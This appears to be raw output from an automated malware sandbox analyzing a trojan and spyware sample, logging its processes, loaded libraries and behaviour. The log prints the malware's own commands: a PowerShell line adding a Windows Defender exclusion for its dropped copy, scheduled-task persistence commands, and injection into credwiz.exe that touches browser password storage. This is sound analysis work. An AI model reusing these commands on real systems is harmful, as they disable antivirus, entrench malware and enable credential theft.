Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_04505910 24_2_04505910
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_04475990 24_2_04475990
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_04527A46 24_2_04527A46
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0452FA49 24_2_0452FA49
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044E3A6C 24_2_044E3A6C
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0451DAC6 24_2_0451DAC6
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_04511AA3 24_2_04511AA3
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0450DAAC 24_2_0450DAAC
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0452FB76 24_2_0452FB76
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044ADBF9 24_2_044ADBF9
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044E5BF0 24_2_044E5BF0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0448FB80 24_2_0448FB80
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00412310 24_2_00412310
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040D20D 24_2_0040D20D
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040D210 24_2_0040D210
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040B440 24_2_0040B440
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040D430 24_2_0040D430
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040B436 24_2_0040B436
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040B584 24_2_0040B584
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0040B590 24_2_0040B590
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00415960 24_2_00415960
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00413B70 24_2_00413B70
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0042BDA0 24_2_0042BDA0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0426E423 24_2_0426E423
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0426E7BD 24_2_0426E7BD
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0427322F 24_2_0427322F
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0426E308 24_2_0426E308
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0426D888 24_2_0426D888
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0426CB23 24_2_0426CB23
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: String function: 01707E54 appears 102 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: String function: 0172EA12 appears 76 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: String function: 016F5130 appears 53 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: String function: 0173F290 appears 98 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: String function: 016AB970 appears 210 times
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: String function: 0196EA12 appears 36 times
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: String function: 01947E54 appears 94 times
Source: C:\Windows\SysWOW64\credwiz.exe Code function: String function: 044A5130 appears 53 times
Source: C:\Windows\SysWOW64\credwiz.exe Code function: String function: 044EF290 appears 98 times
Source: C:\Windows\SysWOW64\credwiz.exe Code function: String function: 0445B970 appears 210 times
Source: C:\Windows\SysWOW64\credwiz.exe Code function: String function: 044DEA12 appears 76 times
Source: C:\Windows\SysWOW64\credwiz.exe Code function: String function: 044B7E54 appears 102 times
One or more processes crash
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 196
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000000.00000002.1061834655.0000000007440000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.CrypterX-gen.112.10371.exe
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000000.00000000.1024295111.0000000000AE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameeOQl.exe< vs SecuriteInfo.com.CrypterX-gen.112.10371.exe
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000005.00000002.1648366255.00000000017AD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.CrypterX-gen.112.10371.exe
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Binary or memory string: OriginalFilenameeOQl.exe< vs SecuriteInfo.com.CrypterX-gen.112.10371.exe
Uses 32bit PE files
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ygTGgAEg.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, yqcuSPwxix5wtVSotd.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, yqcuSPwxix5wtVSotd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, CF1M1hWBYXYVajyyAa.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, yqcuSPwxix5wtVSotd.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, yqcuSPwxix5wtVSotd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/21@2/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe File created: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6820
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe File created: C:\Users\user\AppData\Local\Temp\tmp85EF.tmp Jump to behavior
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: credwiz.exe, 00000018.00000003.2134430359.0000000000818000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.2136689322.0000000000844000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2284749920.0000000000866000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2284749920.000000000083A000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.2134430359.000000000083A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe "C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ygTGgAEg.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp85EF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe "C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ygTGgAEg.exe C:\Users\user\AppData\Roaming\ygTGgAEg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp9C26.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Users\user\AppData\Roaming\ygTGgAEg.exe "C:\Users\user\AppData\Roaming\ygTGgAEg.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 196
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Process created: C:\Windows\SysWOW64\credwiz.exe "C:\Windows\SysWOW64\credwiz.exe"
Source: C:\Windows\SysWOW64\credwiz.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ygTGgAEg.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp85EF.tmp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe "C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp9C26.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Users\user\AppData\Roaming\ygTGgAEg.exe "C:\Users\user\AppData\Roaming\ygTGgAEg.exe" Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Process created: C:\Windows\SysWOW64\credwiz.exe "C:\Windows\SysWOW64\credwiz.exe" Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
